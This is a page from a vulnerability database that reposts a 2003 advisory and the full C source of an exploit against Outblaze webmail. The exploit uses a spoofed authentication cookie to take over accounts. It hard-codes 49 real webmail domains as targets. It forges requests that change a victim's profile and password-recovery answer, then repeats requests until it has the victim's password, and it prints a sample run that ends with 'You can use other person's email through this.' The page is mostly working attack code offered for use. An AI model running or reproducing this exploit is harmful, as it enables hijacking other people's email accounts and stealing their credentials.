Vulners
Lucene search
Outblaze Webmail - Cookie Authentication Bypass
// source: https://www.securityfocus.com/bid/7115/info
Outblaze web mail service has been reported prone to an authentication cookie spoofing vulnerability.
This issue may allow a malicious attacker to bypass the cookie-based authentication mechanisms used by the affected Outblaze web mail server. If successful the attacker may obtain the victim's authentication credentials and gain full access to the victim's e-mail account.
/*
**
** Outblaze Web based e-mail User Cookie Spoofing 0day exploit
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
** Greets: INetCop(c) Security family, my friends.
*/
/*
** This exploit code is very simple, but is convenient.
** This can hack almost Outblaze Web based e-mail service. w00h00~!
**
** It may give password to you.
** Try about 20 times. When attack failed, retry.
** It may inform to you necessarily.
**
** This can test in Korean several sites but, I excluded it.
** Use in research !!!
** When abuse this, clear that there is no responsibility to us.
**
** P.S: Sorry, for my poor english.
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#define X82 0x82
#define D_M 0
#define P_M 1
#define B_M 0x14
#define _B_SIZE 0x800
struct eat
{
int num;
char *mail_host;
char *host_oa;
char *word;
char *domain;
};
struct eat vulns[]=
{
{
/* exploitable */
0,"www.amrer.net",
"amrer_net_oa",";",
"amrer.net"
},
{
/* exploitable */
1,"www.amuro.net",
"amuro_net_oa",";",
"amuro.net"
},
{
/* exploitable */
2,"freemail.amuromail.com",
"amuromail_com_oa",";",
"amuromail.com"
},
{
/* exploitable */
3,"www.astroboymail.com",
"astroboymail_com_oa",";",
"astroboymail.com"
},
{
/* exploitable */
4,"www.dbzmail.com",
"dbzmail_com_oa",";",
"dbzmail.com"
},
{
/* exploitable */
5,"www.doramail.com",
"doramail_com_oa",";",
"doramail.com"
},
{
/* exploitable */
6,"www.glay.org",
"glay_org_oa",";",
"glay.org"
},
{
/* exploitable */
7,"www.jpopmail.com",
"jpopmail_com_oa",";",
"jpopmail.com"
},
{
/* exploitable */
8,"www.keromail.com",
"keromail_com_oa",";",
"keromail.com"
},
{
/* exploitable */
9,"www.kichimail.com",
"kichimail_com_oa",";",
"kichimail.com"
},
{
/* exploitable */
10,"www.norikomail.com",
"norikomail_com_oa",";",
"norikomail.com"
},
{
/* exploitable */
11,"www.otakumail.com",
"otakumail_com_oa",";",
"otakumail.com"
},
{
/* exploitable */
12,"mail.smapxsmap.net",
"smapxsmap_net_oa",";",
"smapxsmap.net"
/* shit, error hint answer form */
},
{
/* exploitable */
13,"www.uymail.com",
"uymail_com_oa",";",
"uymail.com"
},
{
/* exploitable */
14,"www.yyhmail.com",
"yyhmail_com_oa",";",
"yyhmail.com"
},
{
/* exploitable */
15,"mail.china139.com",
"china139_com_oa",";",
"china139.com"
},
{
/* exploitable */
16,"mymail.mailasia.com", /* mymail chk */
"mailasia_com_oa","%3Amailasia.com;",
"mailasia.com"
},
{
/* exploitable */
17,"www.aaronkwok.net",
"aaronkwok_net_oa",";",
"aaronkwok.net"
},
{
/* exploitable */
18,"mymail.bsdmail.com", /* mymail chk */
"bsdmail_com_oa","%3Absdmail.com;",
"bsdmail.com"
},
{
/* exploitable */
19,"mymail.bsdmail.com", /* mymail chk */
"bsdmail_com_oa","%3Absdmail.org;",
"bsdmail.org"
},
{
/* exploitable */
20,"www.ezagenda.com",
"ezagenda_com_oa",";",
"ezagenda.com"
/* shit, error hint answer form */
},
{
/* exploitable */
21,"www.fastermail.com",
"fastermail_com_oa",";",
"fastermail.com"
/* shit, error hint answer form */
},
{
/* exploitable */
22,"mail.wongfaye.com",
"wongfaye_com_oa",";",
"wongfaye.com"
},
{
/* exploitable */
23,"www.graffiti.net",
"graffiti_net_oa",";",
"graffiti.net"
},
{
/* exploitable */
24,"www.hackermail.com",
"hackermail_com_oa",";",
"hackermail.com"
},
{
/* exploitable */
25,"mail.kellychen.com",
"kellychen_com_oa",";",
"kellychen.com"
},
{
/* exploitable */
26,"www.leonlai.net",
"leonlai_net_oa",";",
"leonlai.net"
},
{
/* exploitable */
27,"mymail.linuxmail.org", /* mymail chk */
"linuxmail_org_oa","%3Alinuxmail.org;",
"linuxmail.org"
},
{
/* exploitable */
28,"mymail.outblaze.net", /* mymail chk */
"outblaze_net_oa","%3Aoutblaze.net;",
"outblaze.net"
},
{
/* exploitable */
29,"mymail.outblaze.net", /* mymail chk */
"outblaze_net_oa","%3Aoutblaze.org;",
"outblaze.org"
},
{
/* exploitable */
30,"mymail.outgun.com", /* mymail chk */
"outgun_com_oa","%3Aoutgun.com;",
"outgun.com"
},
{
/* exploitable */
31,"www.surfy.net",
"surfy_net_oa",";",
"surfy.net"
},
{
/* exploitable */
32,"mail.pakistans.com",
"pakistans_com_oa",";",
"pakistans.com"
},
{
/* exploitable */
33,"www.jaydemail.com",
"jaydemail_com_oa",";",
"jaydemail.com"
},
{
/* exploitable */
34,"mail.joinme.com",
"joinme_com_oa",";",
"joinme.com"
},
{
/* exploitable */
35,"www.marchmail.com",
"marchmail.com",";",
"marchmail.com"
},
{
/* exploitable */
36,"mail.nctta.org",
"nctta_org_oa",";",
"nctta.org"
},
{
/* exploitable */
37,"mail.portugalnet.com",
"portugalnet_com_oa",";",
"portugalnet.com"
},
{
/* exploitable */
38,"www.boardermail.com",
"boardermail_com_oa",";",
"boardermail.com"
},
{
/* exploitable */
39,"mymail.mailpuppy.com", /* mymail chk */
"mailpuppy_com_oa","%3Amailpuppy.com;",
"mailpuppy.com"
},
{
/* exploitable */
40,"www.melodymail.com",
"melodymail_com_oa",";",
"melodymail.com"
/* shit, error hint answer form */
},
{
/* exploitable */
41,"www.twinstarsmail.com",
"twinstarsmail_com_oa",";",
"twinstarsmail.com"
/* shit, error hint answer form */
},
{
/* exploitable */
42,"www.purinmail.com",
"purinmail_com_oa",";",
"purinmail.com"
},
{
/* exploitable */
43,"www.gundamfan.com",
"gundamfan_com_oa",";",
"gundamfan.com"
/* shit, error hint answer form */
},
{
/* exploitable */
44,"www.slamdunkfan.com",
"slamdunkfan_com_oa",";",
"slamdunkfan.com"
/* shit, error hint answer form */
},
{
/* exploitable */
45,"www.movemail.com",
"movemail_com_oa",";",
"movemail.com"
/* shit, error hint answer form */
},
{
/* exploitable */
46,"mail.startvclub.com",
"startvclub_com_oa",";",
"startvclub.com"
/* shit, error hint answer form */
},
{
/* exploitable */
47,"www.ultrapostman.com",
"ultrapostman_com_oa",";",
"ultrapostman.com"
},
{
/* exploitable */
48,"mail.sailormoon.com",
"sailormoon_com_oa",";",
"sailormoon.com"
},
{
X82,"x82.inetcop.org",
NULL,NULL,NULL
}
};
int target=D_M;
int sexsock(char *host);
int __make_xpl(char *__xploit_buf,char *tg_id,char *my_mail,int flag);
void re_connt(int sock);
void usage(char *x_name);
void banrl();
int g_pass_chk(char *buf,int size);
int main(int argc, char *argv[])
{
char pass_chk_st[]="This is your password: ";
int sock,whgo;
#define MAIL_ID "xploit"
char m_id[X82]=MAIL_ID;
#define UR_MAIL_ADDRESS "xploit"
char u_id[X82]=UR_MAIL_ADDRESS;
u_char __x_buf[_B_SIZE];
char __r_buf[_B_SIZE];
memset((u_char *)__x_buf,D_M,sizeof(__x_buf));
memset((char *)__r_buf,D_M,sizeof(__r_buf));
(void)banrl();
while((whgo=getopt(argc,argv,"t:i:m:h"))!=-P_M)
{
extern char *optarg;
switch(whgo)
{
case 't':
target=atoi(optarg);
if(target>48)
{
(void)usage(argv[D_M]);
}
break;
case 'i':
memset((char *)m_id,D_M,sizeof(m_id));
strncpy(m_id,optarg,sizeof(m_id)-P_M);
break;
case 'm':
memset((char *)u_id,D_M,sizeof(u_id));
strncpy(u_id,optarg,sizeof(u_id)-P_M);
break;
case 'h':
(void)usage(argv[D_M]);
break;
case '?':
fprintf(stderr,"Try `%s -h' for more information.\n",argv[D_M]);
exit(-P_M);
break;
}
}
if(!strcmp(m_id,MAIL_ID)||!strcmp(u_id,UR_MAIL_ADDRESS))
{
(void)usage(argv[D_M]);
exit(-P_M);
}
else
{
int bf;
{
fprintf(stdout," ============================================================\n");
fprintf(stdout," ++ Cookie Spoofing Brute-force mode. ++\n\n");
fprintf(stdout," [*] Connected to http://%s/.\n",vulns[target].mail_host);
fprintf(stdout," [*] target mail address: %s@%s.\n",m_id,vulns[target].domain);
fprintf(stdout," [*] Wait, getting password:\n");
}
for(bf=D_M;bf<B_M;bf++)
{
sock=(int)sexsock(vulns[target].mail_host);
(void)re_connt(sock);
(int)__make_xpl(__x_buf,m_id,u_id,D_M);
send(sock,__x_buf,strlen(__x_buf),D_M);
memset((char *)__x_buf,D_M,sizeof(__x_buf));
close(sock);
sock=(int)sexsock(vulns[target].mail_host);
(void)re_connt(sock);
(int)__make_xpl(__x_buf,m_id,u_id,P_M);
send(sock,__x_buf,strlen(__x_buf),D_M);
recv(sock,__r_buf,sizeof(__r_buf)-P_M,D_M);
close(sock);
if(NULL!=(char *)strstr(__r_buf,pass_chk_st))
{
if(g_pass_chk((char *)strstr(__r_buf,pass_chk_st),
strlen((char *)strstr(__r_buf,pass_chk_st))))
{
fprintf(stdout," [*] Password sent out by your e-mail (%s).\n",u_id);
break;
}
else
{
fprintf(stdout," [%02d] Use Brute-force mode, connect again ...\n",bf);
}
}
else
{
fprintf(stdout," [%02d] Use Brute-force mode, connect again ...\n",bf);
}
}
fprintf(stdout," ============================================================\n\n");
exit(D_M);
}
}
int __make_xpl(char *__xploit_buf,char *tg_id,char *my_mail,int flag)
{
/* It's my method */
char first_tg[]="/scripts/common/profile.cgi";
char second_tg[]="/scripts/common/forgotpasswd.cgi";
#define LOGIN_SID "login=ff8eb9385445b9f3732c6945bb666024e859ddee6b71f87a&sid="
char f_data[_B_SIZE];
if(!flag)
{
memset((char *)f_data,D_M,sizeof(f_data));
snprintf(f_data,sizeof(f_data)-P_M,
"first_name=Happy-Exploit&last_name=Happy-Exploit&day_of_birth=1&"
"month_of_birth=1&year_of_birth=1900&gender=male&country=KR&"
"occupation=Professional&incomerange=40k&education=techschool&"
"householdsize=3&icq_1=0&ac_address=%s&hint_q=vulnerable&hint_a=exploitable&%s",
my_mail,(LOGIN_SID));
memset((char *)__xploit_buf,D_M,_B_SIZE);
snprintf(__xploit_buf,_B_SIZE-P_M,
"POST %s HTTP/1.0\r\n"
"Host: %s\r\n"
"Cookie: test_cookie=; ob_cookies=%s%s %s=\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"Content-length: %d\r\n\r\n"
"%s\r\n\r\n",
first_tg,vulns[target].mail_host,
tg_id,vulns[target].word,
vulns[target].host_oa,
strlen(f_data),f_data);
}
else
{
switch(target)
{
case 16:
case 27:
case 30:
memset((char *)f_data,D_M,sizeof(f_data));
snprintf(f_data,sizeof(f_data)-P_M,
"domain=%s&login=%s&first_name=Happy-Exploit&last_name=Happy-Exploit&"
"year_or_birth=0&occupation=Professional&alternative_email=%s"
"&hint_a=exploitable&answer_hq=SUBMIT",
vulns[target].domain,tg_id,my_mail);
break;
case 18:
case 19:
case 28:
case 29:
case 39:
memset((char *)f_data,D_M,sizeof(f_data));
snprintf(f_data,sizeof(f_data)-P_M,
"login=%s@%s&first_name=Happy-Exploit&last_name=Happy-Exploit&"
"year_of_birth=0&occupation=Professional&alternative_email=%s"
"&hint_a=exploitable&answer_hq=SUBMIT",
tg_id,vulns[target].domain,my_mail);
break;
default:
memset((char *)f_data,D_M,sizeof(f_data));
snprintf(f_data,sizeof(f_data)-P_M,
"login=%s&first_name=Happy-Exploit&last_name=Happy-Exploit&"
"year_of_birth=0&occupation=Professional&alternative_email=%s"
"&hint_a=exploitable&answer_hq=SUBMIT",
tg_id,my_mail);
break;
}
memset((char *)__xploit_buf,D_M,_B_SIZE);
snprintf(__xploit_buf,_B_SIZE-P_M,
"POST %s HTTP/1.0\r\n"
"Host: %s\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"Content-length: %d\r\n\r\n"
"%s\r\n\r\n",
second_tg,vulns[target].mail_host,strlen(f_data),f_data);
}
}
int g_pass_chk(char *buf,int size)
{
char passwd[X82];
int sz_1_=D_M;
memset((char *)passwd,D_M,sizeof(passwd));
for(sz_1_=D_M;sz_1_<size
&&!(buf[sz_1_+D_M]=='<'&&buf[sz_1_+P_M]=='/');sz_1_++)
{
passwd[sz_1_]=buf[sz_1_];
}
fprintf(stdout,"\n %s\n\n",passwd);
return(P_M);
}
int sexsock(char *host)
{
int sock;
struct hostent *he;
struct sockaddr_in x82;
if((he=gethostbyname(host))==NULL)
{
return(-P_M);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-P_M)
{
return(-P_M);
}
x82.sin_family=AF_INET;
x82.sin_port=htons(80);
x82.sin_addr=*((struct in_addr *)he->h_addr);
memset(&(x82.sin_zero),D_M,8);
if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-P_M)
{
return(-P_M);
}
return(sock);
}
void re_connt(int sock)
{
if(sock==-P_M)
{
fprintf(stderr," [X] Connect Failed.\n");
exit(-P_M);
}
}
void usage(char *x_name)
{
int t=D_M;
fprintf(stdout," Usage: %s -option [argument]\n",x_name);
fprintf(stdout,"\n\t-t [target num] - target mail server.\n");
fprintf(stdout,"\t-i [mail id] - target mail id.\n");
fprintf(stdout,"\t-m [mail addr] - your mail address.\n");
fprintf(stdout,"\t-h - help information.\n\n");
fprintf(stdout," Select target mail number:\n\n");
while(P_M)
{
if(vulns[t].num==X82)
{
break;
}
else fprintf(stdout," {%d} %s\n",vulns[t].num,vulns[t].domain);
t++;
}
fprintf(stdout,"\n Example> %s -t 0 -i admin -m [email protected]\n\n",x_name);
exit(-P_M);
}
void banrl()
{
fprintf(stdout,"\n Outblaze Web based e-mail User Cookie Spoofing 0day exploit\n");
fprintf(stdout," by Xpl017Elz.\n\n");
}
/*
**
** Very Fun Result: --
**
** bash$ ./0x82-eat_outblaze_0dayxpl -t 24 -i tester -m [email protected]
**
** Outblaze Web based e-mail User Cookie Spoofing 0day exploit
** by Xpl017Elz.
**
** ============================================================
** ++ Cookie Spoofing Brute-force mode. ++
**
** [*] Connected to http://www.hackermail.com/.
** [*] target mail address: [email protected].
** [*] Wait, getting password:
**
** This is your password: Happy-Exploit
**
** [*] Password sent out by your e-mail ([email protected]).
** ============================================================
**
** bash$
** --
**
** You can use other person's email through this.
**
*/Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Mar 2003 00:00Current
7High risk
Vulners AI Score7